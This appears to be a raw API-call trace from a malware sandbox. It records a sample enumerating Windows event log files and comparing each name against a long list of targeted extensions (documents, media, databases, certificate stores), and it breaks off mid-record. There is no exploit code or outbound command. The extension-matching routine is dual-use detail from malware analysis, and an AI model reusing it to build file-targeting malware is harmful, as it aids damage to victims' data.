[0285.937] lstrcmpiW (lpString1=".dpx", lpString2="evtx") returned -1 [0285.937] lstrlenW (lpString=".dqy") returned 4 [0285.937] lstrcmpiW (lpString1=".dqy", lpString2="evtx") returned -1 [0285.937] lstrlenW (lpString=".dsn") returned 4 [0285.937] lstrcmpiW (lpString1=".dsn", lpString2="evtx") returned -1 [0285.937] lstrlenW (lpString=".dt") returned 3 [0285.937] lstrcmpiW (lpString1=".dt", lpString2="vtx") returned -1 [0285.937] lstrlenW (lpString=".dtd") returned 4 [0285.937] lstrcmpiW (lpString1=".dtd", lpString2="evtx") returned -1 [0285.937] lstrlenW (lpString=".dwg") returned 4 [0285.937] lstrcmpiW (lpString1=".dwg", lpString2="evtx") returned -1 [0285.937] lstrlenW (lpString=".dwt") returned 4 [0285.937] lstrcmpiW (lpString1=".dwt", lpString2="evtx") returned -1 [0285.937] lstrlenW (lpString=".dx") returned 3 [0285.937] lstrcmpiW (lpString1=".dx", lpString2="vtx") returned -1 [0285.937] lstrlenW (lpString=".dxf") returned 4 [0285.937] lstrcmpiW (lpString1=".dxf", lpString2="evtx") returned -1 [0285.937] lstrlenW (lpString=".edml") returned 5 [0285.937] lstrcmpiW (lpString1=".edml", lpString2=".evtx") returned -1 [0285.937] lstrlenW (lpString=".efd") returned 4 [0285.937] lstrcmpiW (lpString1=".efd", lpString2="evtx") returned -1 [0285.938] lstrlenW (lpString=".elf") returned 4 [0285.938] lstrcmpiW (lpString1=".elf", lpString2="evtx") returned -1 [0285.938] lstrlenW (lpString=".emf") returned 4 [0285.938] lstrcmpiW (lpString1=".emf", lpString2="evtx") returned -1 [0285.938] lstrlenW (lpString=".emz") returned 4 [0285.938] lstrcmpiW (lpString1=".emz", lpString2="evtx") returned -1 [0285.938] lstrlenW (lpString=".epf") returned 4 [0285.938] lstrcmpiW (lpString1=".epf", lpString2="evtx") returned -1 [0285.938] lstrlenW (lpString=".eps") returned 4 [0285.938] lstrcmpiW (lpString1=".eps", lpString2="evtx") returned -1 [0285.938] lstrlenW (lpString=".epsf") returned 5 [0285.938] lstrcmpiW (lpString1=".epsf", lpString2=".evtx") returned -1 [0285.938] lstrlenW (lpString=".epsp") returned 5 [0285.938] lstrcmpiW (lpString1=".epsp", lpString2=".evtx") returned -1 [0285.938] lstrlenW (lpString=".erf") returned 4 [0285.938] lstrcmpiW (lpString1=".erf", lpString2="evtx") returned -1 [0285.938] lstrlenW (lpString=".exr") returned 4 [0285.938] lstrcmpiW (lpString1=".exr", lpString2="evtx") returned -1 [0285.938] lstrlenW (lpString=".f4v") returned 4 [0285.938] lstrcmpiW (lpString1=".f4v", lpString2="evtx") returned -1 [0285.938] lstrlenW (lpString=".fido") returned 5 [0285.938] lstrcmpiW (lpString1=".fido", lpString2=".evtx") returned 1 [0285.938] lstrlenW (lpString=".flm") returned 4 [0285.938] lstrcmpiW (lpString1=".flm", lpString2="evtx") returned -1 [0285.938] lstrlenW (lpString=".flv") returned 4 [0285.938] lstrcmpiW (lpString1=".flv", lpString2="evtx") returned -1 [0285.938] lstrlenW (lpString=".frm") returned 4 [0285.938] lstrcmpiW (lpString1=".frm", lpString2="evtx") returned -1 [0285.938] lstrlenW (lpString=".fxg") returned 4 [0285.938] lstrcmpiW (lpString1=".fxg", lpString2="evtx") returned -1 [0285.938] lstrlenW (lpString=".geo") returned 4 [0285.938] lstrcmpiW (lpString1=".geo", lpString2="evtx") returned -1 [0285.938] lstrlenW (lpString=".gif") returned 4 [0285.938] lstrcmpiW (lpString1=".gif", lpString2="evtx") returned -1 [0285.939] lstrlenW (lpString=".grs") returned 4 [0285.939] lstrcmpiW (lpString1=".grs", lpString2="evtx") returned -1 [0285.939] lstrlenW (lpString=".gz") returned 3 [0285.939] lstrcmpiW (lpString1=".gz", lpString2="vtx") returned -1 [0285.939] lstrlenW (lpString=".h") returned 2 [0285.939] lstrcmpiW (lpString1=".h", lpString2="tx") returned -1 [0285.939] lstrlenW (lpString=".hdr") returned 4 [0285.939] lstrcmpiW (lpString1=".hdr", lpString2="evtx") returned -1 [0285.939] lstrlenW (lpString=".hpp") returned 4 [0285.939] lstrcmpiW (lpString1=".hpp", lpString2="evtx") returned -1 [0285.939] lstrlenW (lpString=".hta") returned 4 [0285.939] lstrcmpiW (lpString1=".hta", lpString2="evtx") returned -1 [0285.939] lstrlenW (lpString=".htc") returned 4 [0285.939] lstrcmpiW (lpString1=".htc", lpString2="evtx") returned -1 [0285.939] lstrlenW (lpString=".htm") returned 4 [0285.939] lstrcmpiW (lpString1=".htm", lpString2="evtx") returned -1 [0285.939] lstrlenW (lpString=".html") returned 5 [0285.939] lstrcmpiW (lpString1=".html", lpString2=".evtx") returned 1 [0285.939] lstrlenW (lpString=".icb") returned 4 [0285.939] lstrcmpiW (lpString1=".icb", lpString2="evtx") returned -1 [0285.939] lstrlenW (lpString=".ics") returned 4 [0285.939] lstrcmpiW (lpString1=".ics", lpString2="evtx") returned -1 [0285.939] lstrlenW (lpString=".iff") returned 4 [0285.939] lstrcmpiW (lpString1=".iff", lpString2="evtx") returned -1 [0285.939] lstrlenW (lpString=".inc") returned 4 [0285.939] lstrcmpiW (lpString1=".inc", lpString2="evtx") returned -1 [0285.939] lstrlenW (lpString=".indd") returned 5 [0285.939] lstrcmpiW (lpString1=".indd", lpString2=".evtx") returned 1 [0285.939] lstrlenW (lpString=".ini") returned 4 [0285.939] lstrcmpiW (lpString1=".ini", lpString2="evtx") returned -1 [0285.939] lstrlenW (lpString=".iqy") returned 4 [0285.939] lstrcmpiW (lpString1=".iqy", lpString2="evtx") returned -1 [0285.940] lstrlenW (lpString=".j2c") returned 4 [0285.940] lstrcmpiW (lpString1=".j2c", lpString2="evtx") returned -1 [0285.940] lstrlenW (lpString=".j2k") returned 4 [0285.940] lstrcmpiW (lpString1=".j2k", lpString2="evtx") returned -1 [0285.940] lstrlenW (lpString=".java") returned 5 [0285.940] lstrcmpiW (lpString1=".java", lpString2=".evtx") returned 1 [0285.940] lstrlenW (lpString=".jp2") returned 4 [0285.940] lstrcmpiW (lpString1=".jp2", lpString2="evtx") returned -1 [0285.940] lstrlenW (lpString=".jpc") returned 4 [0285.940] lstrcmpiW (lpString1=".jpc", lpString2="evtx") returned -1 [0285.940] lstrlenW (lpString=".jpe") returned 4 [0285.940] lstrcmpiW (lpString1=".jpe", lpString2="evtx") returned -1 [0285.940] lstrlenW (lpString=".jpeg") returned 5 [0285.940] lstrcmpiW (lpString1=".jpeg", lpString2=".evtx") returned 1 [0285.940] lstrlenW (lpString=".jpf") returned 4 [0285.940] lstrcmpiW (lpString1=".jpf", lpString2="evtx") returned -1 [0285.940] lstrlenW (lpString=".jpg") returned 4 [0285.940] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0285.940] lstrlenW (lpString=".jpx") returned 4 [0285.940] lstrcmpiW (lpString1=".jpx", lpString2="evtx") returned -1 [0285.940] lstrlenW (lpString=".js") returned 3 [0285.940] lstrcmpiW (lpString1=".js", lpString2="vtx") returned -1 [0285.940] lstrlenW (lpString=".jsf") returned 4 [0285.940] lstrcmpiW (lpString1=".jsf", lpString2="evtx") returned -1 [0285.940] lstrlenW (lpString=".json") returned 5 [0285.940] lstrcmpiW (lpString1=".json", lpString2=".evtx") returned 1 [0285.940] lstrlenW (lpString=".jsp") returned 4 [0285.940] lstrcmpiW (lpString1=".jsp", lpString2="evtx") returned -1 [0285.940] lstrlenW (lpString=".kdc") returned 4 [0285.940] lstrcmpiW (lpString1=".kdc", lpString2="evtx") returned -1 [0285.941] lstrlenW (lpString=".kmz") returned 4 [0285.941] lstrcmpiW (lpString1=".kmz", lpString2="evtx") returned -1 [0285.941] lstrlenW (lpString=".kwm") returned 4 [0285.941] lstrcmpiW (lpString1=".kwm", lpString2="evtx") returned -1 [0285.941] lstrlenW (lpString=".lasso") returned 6 [0285.941] lstrcmpiW (lpString1=".lasso", lpString2="l.evtx") returned -1 [0285.941] lstrlenW (lpString=".lbi") returned 4 [0285.941] lstrcmpiW (lpString1=".lbi", lpString2="evtx") returned -1 [0285.941] lstrlenW (lpString=".lgf") returned 4 [0285.941] lstrcmpiW (lpString1=".lgf", lpString2="evtx") returned -1 [0285.941] lstrlenW (lpString=".lgp") returned 4 [0285.941] lstrcmpiW (lpString1=".lgp", lpString2="evtx") returned -1 [0285.941] lstrlenW (lpString=".log") returned 4 [0285.941] lstrcmpiW (lpString1=".log", lpString2="evtx") returned -1 [0285.941] lstrlenW (lpString=".m1v") returned 4 [0285.941] lstrcmpiW (lpString1=".m1v", lpString2="evtx") returned -1 [0285.941] lstrlenW (lpString=".m4a") returned 4 [0285.941] lstrcmpiW (lpString1=".m4a", lpString2="evtx") returned -1 [0285.941] lstrlenW (lpString=".m4v") returned 4 [0285.941] lstrcmpiW (lpString1=".m4v", lpString2="evtx") returned -1 [0285.941] lstrlenW (lpString=".max") returned 4 [0285.941] lstrcmpiW (lpString1=".max", lpString2="evtx") returned -1 [0285.941] lstrlenW (lpString=".md") returned 3 [0285.941] lstrcmpiW (lpString1=".md", lpString2="vtx") returned -1 [0285.941] lstrlenW (lpString=".mda") returned 4 [0285.941] lstrcmpiW (lpString1=".mda", lpString2="evtx") returned -1 [0285.941] lstrlenW (lpString=".mdb") returned 4 [0285.941] lstrcmpiW (lpString1=".mdb", lpString2="evtx") returned -1 [0285.942] lstrlenW (lpString=".mde") returned 4 [0285.942] lstrcmpiW (lpString1=".mde", lpString2="evtx") returned -1 [0285.942] lstrlenW (lpString=".mdf") returned 4 [0285.942] lstrcmpiW (lpString1=".mdf", lpString2="evtx") returned -1 [0285.942] lstrlenW (lpString=".mdw") returned 4 [0285.942] lstrcmpiW (lpString1=".mdw", lpString2="evtx") returned -1 [0285.942] lstrlenW (lpString=".mef") returned 4 [0285.942] lstrcmpiW (lpString1=".mef", lpString2="evtx") returned -1 [0285.942] lstrlenW (lpString=".mft") returned 4 [0285.942] lstrcmpiW (lpString1=".mft", lpString2="evtx") returned -1 [0285.942] lstrlenW (lpString=".mfw") returned 4 [0285.942] lstrcmpiW (lpString1=".mfw", lpString2="evtx") returned -1 [0285.942] lstrlenW (lpString=".mht") returned 4 [0285.942] lstrcmpiW (lpString1=".mht", lpString2="evtx") returned -1 [0285.942] lstrlenW (lpString=".mhtml") returned 6 [0285.942] lstrcmpiW (lpString1=".mhtml", lpString2="l.evtx") returned -1 [0285.942] lstrlenW (lpString=".mka") returned 4 [0285.942] lstrcmpiW (lpString1=".mka", lpString2="evtx") returned -1 [0285.942] lstrlenW (lpString=".mkidx") returned 6 [0285.942] lstrcmpiW (lpString1=".mkidx", lpString2="l.evtx") returned -1 [0285.942] lstrlenW (lpString=".mkv") returned 4 [0285.942] lstrcmpiW (lpString1=".mkv", lpString2="evtx") returned -1 [0285.942] lstrlenW (lpString=".mos") returned 4 [0285.942] lstrcmpiW (lpString1=".mos", lpString2="evtx") returned -1 [0285.942] lstrlenW (lpString=".mov") returned 4 [0285.942] lstrcmpiW (lpString1=".mov", lpString2="evtx") returned -1 [0285.942] lstrlenW (lpString=".mp3") returned 4 [0285.942] lstrcmpiW (lpString1=".mp3", lpString2="evtx") returned -1 [0285.942] lstrlenW (lpString=".mp4") returned 4 [0285.942] lstrcmpiW (lpString1=".mp4", lpString2="evtx") returned -1 [0285.942] lstrlenW (lpString=".mpeg") returned 5 [0285.942] lstrcmpiW (lpString1=".mpeg", lpString2=".evtx") returned 1 [0285.942] lstrlenW (lpString=".mpg") returned 4 [0285.942] lstrcmpiW (lpString1=".mpg", lpString2="evtx") returned -1 [0285.942] lstrlenW (lpString=".mpv") returned 4 [0285.943] lstrcmpiW (lpString1=".mpv", lpString2="evtx") returned -1 [0285.943] lstrlenW (lpString=".mrw") returned 4 [0285.943] lstrcmpiW (lpString1=".mrw", lpString2="evtx") returned -1 [0285.943] lstrlenW (lpString=".msg") returned 4 [0285.943] lstrcmpiW (lpString1=".msg", lpString2="evtx") returned -1 [0285.943] lstrlenW (lpString=".mxl") returned 4 [0285.943] lstrcmpiW (lpString1=".mxl", lpString2="evtx") returned -1 [0285.943] lstrlenW (lpString=".myd") returned 4 [0285.943] lstrcmpiW (lpString1=".myd", lpString2="evtx") returned -1 [0285.943] lstrlenW (lpString=".myi") returned 4 [0285.943] lstrcmpiW (lpString1=".myi", lpString2="evtx") returned -1 [0285.943] lstrlenW (lpString=".nef") returned 4 [0285.943] lstrcmpiW (lpString1=".nef", lpString2="evtx") returned -1 [0285.943] lstrlenW (lpString=".nrw") returned 4 [0285.943] lstrcmpiW (lpString1=".nrw", lpString2="evtx") returned -1 [0285.943] lstrlenW (lpString=".obj") returned 4 [0285.943] lstrcmpiW (lpString1=".obj", lpString2="evtx") returned -1 [0285.943] lstrlenW (lpString=".odb") returned 4 [0285.943] lstrcmpiW (lpString1=".odb", lpString2="evtx") returned -1 [0285.943] lstrlenW (lpString=".odc") returned 4 [0285.943] lstrcmpiW (lpString1=".odc", lpString2="evtx") returned -1 [0285.943] lstrlenW (lpString=".odm") returned 4 [0285.943] lstrcmpiW (lpString1=".odm", lpString2="evtx") returned -1 [0285.943] lstrlenW (lpString=".odp") returned 4 [0285.943] lstrcmpiW (lpString1=".odp", lpString2="evtx") returned -1 [0285.943] lstrlenW (lpString=".ods") returned 4 [0285.943] lstrcmpiW (lpString1=".ods", lpString2="evtx") returned -1 [0285.943] lstrlenW (lpString=".oft") returned 4 [0285.943] lstrcmpiW (lpString1=".oft", lpString2="evtx") returned -1 [0285.944] lstrlenW (lpString=".one") returned 4 [0285.944] lstrcmpiW (lpString1=".one", lpString2="evtx") returned -1 [0285.944] lstrlenW (lpString=".onepkg") returned 7 [0285.944] lstrcmpiW (lpString1=".onepkg", lpString2="al.evtx") returned -1 [0285.944] lstrlenW (lpString=".onetoc2") returned 8 [0285.944] lstrcmpiW (lpString1=".onetoc2", lpString2="nal.evtx") returned -1 [0285.944] lstrlenW (lpString=".opt") returned 4 [0285.944] lstrcmpiW (lpString1=".opt", lpString2="evtx") returned -1 [0285.944] lstrlenW (lpString=".oqy") returned 4 [0285.944] lstrcmpiW (lpString1=".oqy", lpString2="evtx") returned -1 [0285.944] lstrlenW (lpString=".orf") returned 4 [0285.944] lstrcmpiW (lpString1=".orf", lpString2="evtx") returned -1 [0285.944] lstrlenW (lpString=".p12") returned 4 [0285.944] lstrcmpiW (lpString1=".p12", lpString2="evtx") returned -1 [0285.944] lstrlenW (lpString=".p7b") returned 4 [0285.944] lstrcmpiW (lpString1=".p7b", lpString2="evtx") returned -1 [0285.944] lstrlenW (lpString=".p7c") returned 4 [0285.944] lstrcmpiW (lpString1=".p7c", lpString2="evtx") returned -1 [0285.944] lstrlenW (lpString=".pam") returned 4 [0285.944] lstrcmpiW (lpString1=".pam", lpString2="evtx") returned -1 [0285.944] lstrlenW (lpString=".pbm") returned 4 [0285.944] lstrcmpiW (lpString1=".pbm", lpString2="evtx") returned -1 [0285.944] lstrlenW (lpString=".pct") returned 4 [0285.944] lstrcmpiW (lpString1=".pct", lpString2="evtx") returned -1 [0285.944] lstrlenW (lpString=".pcx") returned 4 [0285.944] lstrcmpiW (lpString1=".pcx", lpString2="evtx") returned -1 [0285.944] lstrlenW (lpString=".pdd") returned 4 [0285.944] lstrcmpiW (lpString1=".pdd", lpString2="evtx") returned -1 [0285.945] lstrlenW (lpString=".pdf") returned 4 [0285.945] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0285.945] lstrlenW (lpString=".pdp") returned 4 [0285.945] lstrcmpiW (lpString1=".pdp", lpString2="evtx") returned -1 [0285.945] lstrlenW (lpString=".pef") returned 4 [0285.945] lstrcmpiW (lpString1=".pef", lpString2="evtx") returned -1 [0285.945] lstrlenW (lpString=".pem") returned 4 [0285.945] lstrcmpiW (lpString1=".pem", lpString2="evtx") returned -1 [0285.945] lstrlenW (lpString=".pff") returned 4 [0285.945] lstrcmpiW (lpString1=".pff", lpString2="evtx") returned -1 [0285.945] lstrlenW (lpString=".pfm") returned 4 [0285.945] lstrcmpiW (lpString1=".pfm", lpString2="evtx") returned -1 [0285.945] lstrlenW (lpString=".pfx") returned 4 [0285.945] lstrcmpiW (lpString1=".pfx", lpString2="evtx") returned -1 [0285.945] lstrlenW (lpString=".pgm") returned 4 [0285.945] lstrcmpiW (lpString1=".pgm", lpString2="evtx") returned -1 [0285.945] lstrlenW (lpString=".php") returned 4 [0285.945] lstrcmpiW (lpString1=".php", lpString2="evtx") returned -1 [0285.945] lstrlenW (lpString=".php3") returned 5 [0285.945] lstrcmpiW (lpString1=".php3", lpString2=".evtx") returned 1 [0285.946] lstrlenW (lpString=".php4") returned 5 [0285.946] lstrcmpiW (lpString1=".php4", lpString2=".evtx") returned 1 [0285.946] lstrlenW (lpString=".php5") returned 5 [0285.946] lstrcmpiW (lpString1=".php5", lpString2=".evtx") returned 1 [0285.946] lstrlenW (lpString=".phtml") returned 6 [0285.946] lstrcmpiW (lpString1=".phtml", lpString2="l.evtx") returned -1 [0285.946] lstrlenW (lpString=".pict") returned 5 [0285.946] lstrcmpiW (lpString1=".pict", lpString2=".evtx") returned 1 [0285.946] lstrlenW (lpString=".pl") returned 3 [0285.946] lstrcmpiW (lpString1=".pl", lpString2="vtx") returned -1 [0285.946] lstrlenW (lpString=".pls") returned 4 [0285.946] lstrcmpiW (lpString1=".pls", lpString2="evtx") returned -1 [0285.946] lstrlenW (lpString=".pm") returned 3 [0285.946] lstrcmpiW (lpString1=".pm", lpString2="vtx") returned -1 [0285.946] lstrlenW (lpString=".png") returned 4 [0285.946] lstrcmpiW (lpString1=".png", lpString2="evtx") returned -1 [0285.946] lstrlenW (lpString=".pnm") returned 4 [0285.947] lstrcmpiW (lpString1=".pnm", lpString2="evtx") returned -1 [0285.947] lstrlenW (lpString=".pot") returned 4 [0285.947] lstrcmpiW (lpString1=".pot", lpString2="evtx") returned -1 [0285.947] lstrlenW (lpString=".potm") returned 5 [0285.947] lstrcmpiW (lpString1=".potm", lpString2=".evtx") returned 1 [0285.947] lstrlenW (lpString=".potx") returned 5 [0285.947] lstrcmpiW (lpString1=".potx", lpString2=".evtx") returned 1 [0285.947] lstrlenW (lpString=".ppa") returned 4 [0285.947] lstrcmpiW (lpString1=".ppa", lpString2="evtx") returned -1 [0285.947] lstrlenW (lpString=".ppam") returned 5 [0285.947] lstrcmpiW (lpString1=".ppam", lpString2=".evtx") returned 1 [0285.947] lstrlenW (lpString=".ppm") returned 4 [0285.947] lstrcmpiW (lpString1=".ppm", lpString2="evtx") returned -1 [0285.947] lstrlenW (lpString=".pps") returned 4 [0285.947] lstrcmpiW (lpString1=".pps", lpString2="evtx") returned -1 [0285.947] lstrlenW (lpString=".ppsm") returned 5 [0285.947] lstrcmpiW (lpString1=".ppsm", lpString2=".evtx") returned 1 [0285.947] lstrlenW (lpString=".ppt") returned 4 [0285.947] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0285.947] lstrlenW (lpString=".pptm") returned 5 [0285.947] lstrcmpiW (lpString1=".pptm", lpString2=".evtx") returned 1 [0285.947] lstrlenW (lpString=".pptx") returned 5 [0285.947] lstrcmpiW (lpString1=".pptx", lpString2=".evtx") returned 1 [0285.947] lstrlenW (lpString=".prn") returned 4 [0285.947] lstrcmpiW (lpString1=".prn", lpString2="evtx") returned -1 [0285.947] lstrlenW (lpString=".ps") returned 3 [0285.947] lstrcmpiW (lpString1=".ps", lpString2="vtx") returned -1 [0285.948] lstrlenW (lpString=".psb") returned 4 [0285.948] lstrcmpiW (lpString1=".psb", lpString2="evtx") returned -1 [0285.948] lstrlenW (lpString=".psd") returned 4 [0285.948] lstrcmpiW (lpString1=".psd", lpString2="evtx") returned -1 [0285.948] lstrlenW (lpString=".pst") returned 4 [0285.948] lstrcmpiW (lpString1=".pst", lpString2="evtx") returned -1 [0285.948] lstrlenW (lpString=".ptx") returned 4 [0285.948] lstrcmpiW (lpString1=".ptx", lpString2="evtx") returned -1 [0285.948] lstrlenW (lpString=".pub") returned 4 [0285.948] lstrcmpiW (lpString1=".pub", lpString2="evtx") returned -1 [0285.948] lstrlenW (lpString=".pwm") returned 4 [0285.948] lstrcmpiW (lpString1=".pwm", lpString2="evtx") returned -1 [0285.948] lstrlenW (lpString=".pxr") returned 4 [0285.948] lstrcmpiW (lpString1=".pxr", lpString2="evtx") returned -1 [0285.948] lstrlenW (lpString=".py") returned 3 [0285.948] lstrcmpiW (lpString1=".py", lpString2="vtx") returned -1 [0285.948] lstrlenW (lpString=".qt") returned 3 [0285.948] lstrcmpiW (lpString1=".qt", lpString2="vtx") returned -1 [0285.948] lstrlenW (lpString=".r3d") returned 4 [0285.948] lstrcmpiW (lpString1=".r3d", lpString2="evtx") returned -1 [0285.948] lstrlenW (lpString=".raf") returned 4 [0285.948] lstrcmpiW (lpString1=".raf", lpString2="evtx") returned -1 [0285.948] lstrlenW (lpString=".rar") returned 4 [0285.948] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0285.948] lstrlenW (lpString=".raw") returned 4 [0285.948] lstrcmpiW (lpString1=".raw", lpString2="evtx") returned -1 [0285.949] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbcf0ff2, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcbcf0ff2, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-NetworkProfile%4Operational.evtx", cAlternateFileName="MIFC66~1.EVT")) returned 1 [0285.949] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ab3154, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ab3154, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Ntfs%4Operational.evtx", cAlternateFileName="MI6E98~1.EVT")) returned 1 [0285.949] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ad9393, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ad9393, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Ntfs%4WHC.evtx", cAlternateFileName="MIB2AC~1.EVT")) returned 1 [0285.949] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5fe5cb, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca5fe5cb, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", cAlternateFileName="MI6AFE~1.EVT")) returned 1 [0285.949] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe24cdef0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xe24cdef0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-ReadyBoost%4Operational.evtx", cAlternateFileName="MIB9D2~1.EVT")) returned 1 [0285.949] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd125335f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd125335f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", cAlternateFileName="MI7A67~1.EVT")) returned 1 [0285.950] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1fe2941, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd1fe2941, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-SettingSync%4Debug.evtx", cAlternateFileName="MI3773~1.EVT")) returned 1 [0285.950] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1fe2941, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd1fe2941, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-SettingSync%4Operational.evtx", cAlternateFileName="MI36AA~1.EVT")) returned 1 [0285.950] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3852b12, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd3852b12, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", cAlternateFileName="MI2E2E~1.EVT")) returned 1 [0285.950] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3852b12, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd3852b12, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Shell-Core%4Operational.evtx", cAlternateFileName="MI1C6C~1.EVT")) returned 1 [0285.950] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97d66c8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97d66c8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-SmbClient%4Connectivity.evtx", cAlternateFileName="MI00FB~1.EVT")) returned 1 [0285.950] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97b042f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97b042f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-SMBClient%4Operational.evtx", cAlternateFileName="MID8B0~1.EVT")) returned 1 [0285.950] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: 